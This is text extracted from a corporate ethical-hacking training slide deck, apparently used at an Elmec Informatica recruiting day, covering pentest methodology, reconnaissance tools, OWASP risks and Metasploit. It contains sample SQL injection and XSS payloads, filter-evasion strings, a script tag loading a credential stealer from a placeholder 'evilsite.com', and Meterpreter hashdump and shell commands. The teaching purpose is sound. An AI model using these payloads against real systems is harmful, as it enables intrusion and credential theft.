Sei sulla pagina 1di 78

Sommario

#centopercentonoi

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 1


Agenda

Monday 14th 2018


09:00
13:00- -09:15 | Presentazione
13:15 Company Identity Aziendale
09:15
13:15- -11.15 | Workshop
15:00 Workshop Ethical
"Ethical Hacking
Hacking”
11:30 - 12:30 | Testth Attitudinale
Thursday
14:00 - 14:30 17| Test2018
Tecnico
12:30 - 13:00 Kahoot!
14:30 - 16:30 | Business Game "Capture the flag"
13:00 - 16:30 Business Game "Capture the flag"

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 2


Fatturato di gruppo 2017: 220.000.000
+ 650 dipendenti
70% tecnici specializzati €
Informatica

8
45,3%
Eolo 45,1%
Elmec Spa 6,6%

LOMBARDIA (5) Solar 2,2%

VENETO Suisse 0,6%


0,1%
EMILIA ROMAGNA Trub

SVIZZERA

SEDI Δ crescita negli ultimi 3 anni: +60.000.000 €


(+38%)
I NOSTRI ALLEATI

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 4


Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 5
Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 6
Linkedin – Pagina Carriere Elmec

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 7


Ethical Hacking
Marco Mazzarini

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 8


Summary
AGENDA

• Introduction to Ethical Hacking


• How to become an Ethical Hacker
• Penetration Test
• Analysis of an attack
• Common attack vectors
• Common Vulnerabilies
• Q&A

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 9


Hacking
Hacking?

The word hacking comes from «to hack», that means «alter». People who practise
hacking are called hackers: their purpose is to gain a deep knowledge of the
system they are using, in such a way that they can access and even adapt to their
needs. [wikipedia]

https://en.wikipedia.org/wiki/Hacking

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 10


Ethical Hacking
Ethical Hacker

The term hacking, in computer jargon, is often characterized by a negative


meaning, as in the collective imagination identifies a type of operations and
behaviors that are completely illegal. However, hacking actually includes a series
of perfectly legal activities, carried out also at a professional level: IT systems
are in fact subjected to specific and constant tests in order to evaluate and prove
their safety and reliability. [wikipedia]

https://en.wikipedia.org/wiki/Hacking

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 11


Summary
Coloured hat?

• White Hat - is a hacker who opposes the abuse of computer systems. Its
activity is a coordinated and comprehensive verification of the security of a
network and of the systems that compose it. He specializes in penetration
testing and all methods for testing the security of computer systems.
• Grey Hat – Even if the purpose is not as “Black Hat”, sometimes it crosses the
boundary of legality.
• Black Hat (Cracker / Wannabe / Lamer) - malicious hackers or criminals
with different levels of skills.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 12


Black Hat

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 13


Ethical Hacking
Ethical Hacker

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 14


Ethical Hacking
Ethical Hacker

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 15


Ethical Hacking
Art of Ethical Hacker

Ethical hacking is an "art" in the sense that the "artist" must posses the skills and
knowledge of a potential attacker (to imitate an attack) and the resources with
which to mitigate the vulnerabilities used by attackers. [SANS]

https://www.sans.org/reading-room/whitepapers/auditing/red-teaming-art-ethical-hacking-1272

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 16


Ethical Hacking
The path of an Ethical Hacker

Must have:
The desire to learn ☺

Ideal path

• Knowledge of Linux (LPIC, RHCA, etc)


• Knowledge of Windows, client e server (sysadmin, MCSA)
• Knowledge of Network e Cloud (CCNA, Network+, etc)
• Knowledge of programming (Python, bash, VBasic, C++, etc)
• Knowledge of web technologies (jQuery, HTML5, PHP, javascript, NodeJs, etc)
• Knowledge of Database (MongoDB, MSSQL Server, mysql, oracle, etc)
• Knowledge of security (CEH, SANS GPEN, OSCP, etc)
• Knowledge of tools, «Think different», English, Management, etc..

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 17


Legal Agreement
Legal Agreement

Anyone who improperly introduces himself into an IT or electronic system


protected by security measures or who remains there against the express or tacit
intention of those who have the right to exclude him, is punished with
imprisonment for up to three years.

It is necessary to sign a legal agreement defining the purpose and the limits within
which it is possible to act, namely:
IP to test
IP of origin of the attacks
methods and tools to use
times
the start conditions
completion of the tests
processing of the information collected
https://www.brocardi.it/codice-penale/libro-secondo/titolo-xii/capo-iii/sezione-iv/art615ter.html

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 18


Vulnerabilities
Vulnerabilities
The vulnerability can be interpreted as a component of a system, at which the
security measures are absent, reduced or compromised, which is a weak point in
the system and allows an attacker to compromise the level of security [wikipedia]

https://it.wikipedia.org/wiki/Vulnerabilit%C3%A0

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 19


Vulnerabilities
Vulnerabilities

Common Vulnerability Scoring System v3.0


• Attack Vector
• Attack Complexity
• Privileges Required
• User Interaction
• Scope
• Confidentiality Impact
• Integrity Impact
• Availability Impact

https://www.atlassian.com/trust/security/security-severity-levels

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 20


Vulnerabilities
Vulnerabilities

A system can be said to be vulnerable if it is possible:

• access internal resources


• read and edit confidential files
• check the incoming and / or outgoing traffic
• run programs without permission
• have administrator permissions (root) from non-privileged users
• check the configuration of the network and services.

https://it.wikipedia.org/wiki/Vulnerabilit%C3%A0

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 21


Penetration Test
Penetration Test

The penetration test is the methodology of evaluating the security of a system or a


network.
• Divided into several phases
• Highlight weaknesses
• Provides information on vulnerabilities

A pen-test has to test the security of a system by trying to violate it submitting a


variety of attacks, providing a clear estimate of defense capabilities and threat
resilience.

http://www.nsaitalia.it/penetration-test.php

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 22


Penetration Test
Methodology

Knowledge level:
• zero knowledge (black box): no information is provided
• partial knowledge (gray box): a little information is provided
• full knowledge (white box): much of the information is known to the tester

Other scenario:
• social engineering: testing the vulnerability of a company's employees
• Phisical security: the ease of access to areas that are not normally allowed.

http://www.nsaitalia.it/penetration-test.php

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 23


Penetration Test
Results and Report

The report must indicate for each vulnerability found:


• Software / device affected by the vulnerability (Name and version)
• Type of vulnerability found
• Severity of the bug (Low, Medium, High, Critical)
• Detailed description of the problem and the methods used to identify it
• Tips for mitigation / correction and notes.
http://www.nsaitalia.it/penetration-test.php

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 24


Analysis of an attack

https://en.wikipedia.org/wiki/Kill_chain

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 26


Reconnaisance
Reconnaissance

Objective: email, FQDN, IP, ports and other valuable information.

You can search for target’s domains and keyword with:

• Search Engine like Google / Bing / Yahoo / DuckDuckGo.

• Google Dorks https://www.exploit-db.com/google-hacking-database/

Example: filetype:pdf site:cnn.com password

Example: inurl:"-wp13.txt"

• Whois, Dig, Nslookup


• Social Network

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 27


Reconnaisance
Reconnaissance

• You can leverage https://www.wappalyzer.com/ to retrieve technologies used

• Fierce Tool: retrieves information about domains and subdomains

fierce -dns example.com

• Hping – Gathers OS info


hping example.com -S -V -p 443
• TheHarvester – finds email using Search Engines

theharvester -d example.com -l 500 -b google

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 28


Reconnaisance
Reconnaissance – Nmap

Nmap is a tool used to launch network scans:


nmap --help

nmap -sT 192.168.1.1 # scan top ports

nmap -F -p 80,443 192.168.1.1 # fast scan port 80,443

nmap -v -sS -A -T4 192.168.1.1 #Verbose, Stealth, OS Detect, aggressive

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 29


Reconnaisance
Reconnaissance

• It’s a best practise to put the various pieces together even with the help of
graphic tools like Maltego.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 32


Web Application Security Scanner
Interact with a Web server

The most common way to interact with a web server is using a browser, a
program that sends request using http(s) protocol and renders the replies.

Usually GET e POST are the most common commands to interact (but you can
also find HEAD PUT DELETE TRACE OPTIONS CONNECT)

• GET
www.example.org/demo_form.php?name1=value1&name2=value2

• POST
POST /test/demo_form.php HTTP/1.1
Host: w3schools.com
name1=value1&name2=value2

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 33


Web Application Security Scanner
Status codes
• 1xx: Informational
• 2xx: Successful
• 3xx: Redirection (there is no immediate answer, but the request is correct and it
will communicate how to get the answer)
• 4xx: Client error (the request can not be satisfied because it is wrong)
• 5xx: Server error (the request can not be satisfied due to an internal server
problem)

Common status codes:


• 200 OK.
• 301 Moved Permanently.
• 302 Found.
• 400 Bad Request.
• 404 Not Found.
• 500 Internal Server Error.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 34


Web Application Security Scanner
Web Application Security Scanner
To make a more in-depth and manual analysis it is necessary to use a tool that
intercepts web requests.

The most used tools are «Burp Suite» and «ZAP», or proxies that make a mitm
between the browser and the web server.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 35


Web Application Security Scanner
Web Application Security Scanner
From “options” menu you can configure the listening port (and other parameters),
which must be the same in your preferred browser.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 36


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 37


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 38


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 39


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 40


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 41


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 42


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 43


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 44


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 45


Web Application Security Scanner

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 46


OWASP
OWASP

• Open Web Application Security Project (OWASP) is an open-source project,


created with the intention of making developers aware of the issue of security
and offers guidelines on the creation of secure Internet applications.
• Famous for its "top 10" of the risks related to errors on the developers side,
which is drawn up every year.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 47


OWASP

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 48


OWASP
OWASP

• The "standard" risk is calculated as Probability x Damage, and goes from the
"Low" level to the "Critical" level

R=PxD

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 49


OWASP
Injection

• Any data source can be an injection vector: environment variables, parameters,


internal and external services, users, etc
• The vulnerability appears when an attacker can send arbitrary data to the
interpreter.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 51


OWASP
Injection

SQL Injection Example:

Missing or incomplete validation of input: The application trusts the user and its
input values. So they are programming errors.

"SELECT * FROM accounts WHERE custID='"+request.getParameter("id")+ "'";

A legit query could be:


'SELECT * FROM accounts WHERE custID= '5'

The attacker modifies the 'id' parameter and adds: ' or '1'='1
http://example.com/app/accountView?id= '5' or '1'='1

SELECT * FROM accounts WHERE custID= '5' or '1'='1';

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 52


OWASP
Injection

What if the attacker wants to delete the entire content of a table?

• a'; DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

• You can execute any SQL query which is authorized to the account used by
webapp

Other examples:

• id=1) OR SLEEP(25)=0 LIMIT 1--

• 1 AND if((ascii(lower(substring((select
user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))

• union%20%64istinctRO%57%20select

• +UnIOn%0d%0aSeleCt%0d%0a

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 53


OWASP
Injection

Other Injection attacks

• Code Injection: typical OS comands, for example:


o DIR/LS/CD, PING, ECHO, telnet/ssh/netcat/
o http://www.site.com/get-files?file=../../../../dir/file (path Traversal)

• Blind SQL Injection: I can’t see the results, but..


o http://www.site.com/app.php?id=1' waitfor delay '00:00:10‘--

• Blind XPath Injection: using XML


o //Employee[UserName/text()='blah' or 1=1 or 'a'='a' And Pass/text()='blah']

• LDAP injection: using ldap protocol


o user=*)(uid=*))(|(uid=* pass=password

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 54


OWASP
Injection

Why it happens…

• The data provided by the user are not checked or cleaned by the app
• Queries or commands are executed directly by the interpreter
• The commands are used directly or concatenated, using: parameters, headers,
URLs, cookies, JSON, SOAP, and XML

How to prevent?
• Account must be limited
• Use positive input validation or server-side whitelist
• Escape special characters according to the database syntax
• Use safe and verified APIs

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 55


OWASP
Broken Authentication

The most feared and perceived attack, as it violates the authentication system and
the related information such as:
• Sensitive personal information (sensitive personal information, PII)
• Credentials
• medical records
• personal data
• credit cards

There are a few of regulations (ISO 27001, GDPR, etc) that regulate, strengthen
and make the protection of personal data more homogeneous.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 56


OWASP

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 57


OWASP
Broken Authentication

Why it happens…

• The attacker has a list of valid username and password


• It allows a brute force or other type of automatic attack
• Allows standard, weak, or well-known passwords, such as "Password1" or
"admin / admin".
• Use weak or non-effective credential recovery as "security questions".
• Use weakly encrypted or hashed, or even plaintext password
• Authentication with two (or more) factors is not well implemented.
• Exposing the "Session ID" in the URL
• It does not change the "Session ID" after a correct login.
• It does not correctly handle expired Session IDs.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 58


OWASP
Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a vulnerability that affects dynamic websites that use
insufficient control of the input in the forms.

An XSS allows a Cracker to insert or execute client-side code

the technique includes the use of any client-side scripting language including
JavaScript, VBScript, Flash, HTML

An XSS allows the collection, manipulation and redirection of confidential


information, viewing and editing of data on servers, alteration of the dynamic
behavior of web pages, etc.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 59


OWASP
Cross-Site Scripting (XSS)

Three different types of XSS:

• Non Persistent

• Persistent

• DOM (Document Object Model)

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 60


OWASP
Cross-Site Scripting (XSS)

The fastest way to check for a cross-site scripting (XSS) vulnerability is to enter
the following code in some input:

<script type='text/javascript'>alert('xss');</script>

For this type of XSS (Non Persistent) the result will be immediately visible only to
the user who generated it

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 61


OWASP
Cross-Site Scripting (XSS)

The evolution of the previous type of XSS is the use of persistence, so that the
code is executed every time the page is loaded.

<script src="http://evilsite.com/authstealer.js">

The goal of blackhat is to insert a similar code on the admin page, often with slight
variations

<IMG SRC=javascript:alert('XSS')>

<IMG SRC= onmouseover="alert('xxs')">

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 62


OWASP
Cross-Site Scripting (XSS)

You can trick the various filters or Web Application Firewall with various
techniques:
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&">

Set.constructor`alert\x28document.domain\x29```

You can find online cheat sheets that summarize the most common methods of
obfuscation

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 63


OWASP
Cross-Site Scripting (XSS)

DOM XSS:

<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>

http://www.example.com/test.html#<script>alert(1)</script>

DOM XSS can not be blocked by server-side filters. Anything after the "#" (hash)
is never sent to the server.

HTML Modification sinks


document.write / (element).innerHTML
HTML modification to behaviour change
(element).src (in certain elements)
Execution Related sinks: eval / setTimout / setInterval / execScript

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 64


OWASP
Cross-Site Scripting (XSS)

How to avoid them?

• Use frameworks that escape by design


• Escape HTTP requests according to the context of HTML output (body,
attribute, JavaScript, CSS, or URL). Use of the Cheat Sheet 'XSS Prevention'
as a base.
• Install a WAF (web application firewall)
• If DOM, you can use innerText / textContent instead of innerHtml
• Use CSP: Content Security Policy

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 65


OWASP
Exposure

How it happens?
• Data is transmitted in clear text (HTTP, SMTP, FTP). Also internally (between
load balancers, web servers, or back-end).
• Sensitive data is saved in clear text, including backups
• There are weak or old encryption algorithms
• There are standard, weak or recycled cryptographic keys, or missing key
management
• The encryption is not forced
• The client does not check the validity of the certificate

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 66


OWASP
Exposure

How it happens?
• With the historical Ettercap, or the most recent Bettercap it is possible to make
a man-in-the-middle, provided that it is in the same network as the target.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 67


OWASP
Exposure

How to prevent?
• Classify the data processed, stored, or transmitted by the application
• Apply checks according to the classification
• Do not save sensitive data if not necessary. Data not stored can’t be stolen ☺
• Encrypt all sensitive data.
• Use algorithms, protocols, updated procedures
• Encrypt data in transit (TLS)
• Disable caching for responses with sensitive data
• Save password with hashing + salt
• Perform external audits

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 68


OWASP
Vulnerable Components

How it happens?

• If you do not know the versions of the components in use (server / client)
• The software is vulnerable, no longer supported or out of date
• No periodic scans are done
• Software is not updated quickly (with the help of security bulletins)
• Developers do not adequately verify the updates of the various components
• The components are not configured properly

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 69


OWASP
Vulnerable Components

There are tools that allow the scanning of vulnerabilities automatically for example
nessus, coreImpact, acunetix and openVas

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 70


OWASP
Vulnerable Components

You can manually search for vulnerabilities based on the version of components
used, using websites that list vulnerabilities by categories.

Pro:
• Unnoticed
• Less likely to cause a malfunction
• More precise

Cons:
• Slow
• Tests or important checks can be skipped
• Human Error

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 71


MSF
Metasploit Framework

Metasploit is a penetration test framework that allows you to find, exploit and
convalidate vulnerabilities.

Inside this framework there are a ton of useful tools configured in such a way that
they can work together in the best way.

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 72


MSF
Metasploit Framework

You can start msfconsole after the prerequisites are ok

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 73


MSF
Metasploit Framework

You can start the different auxiliary tool against the targets:

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 79


MSF
Metasploit Framework

You can start the tools against the targets:

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 80


MSF
Metasploit Framework

You can configure the tools before starting the attack:

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 81


MSF
Metasploit Framework

Until you can «achieve» the target ☺

You can also go further

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 82


MSF
Metasploit Framework

Meterpreter let you use the devices’s webcam:

• webcam_snap –h

Or let you execute «post exploitation» actions:

• run post/windows/gather/hashdump

• execute -f cmd.exe -i -H

• download c:\\myfile.txt

• shell

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 83


OWASP

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 85


OWASP
Recapping…

• Always update yourself on the latest news☺


• Update the software and devices in use
• Monitor the security status of systems, keeping logs and doing audits
• Always backup in a safe place
• Enable 2-factor authentication
• Always perform the sanitization of the input [WEB]
• Encrypt devices
• Use secure channels (SSL/TLS)
• Never trust ☺

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 86


Q&A

https://en.wikipedia.org/wiki/Kill_chain

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 87


Thanking

Thank you!
Marco Mazzarini
Marco.mazzarini@elmec.it

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 88


Getting ready
Preparazione per il test

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 89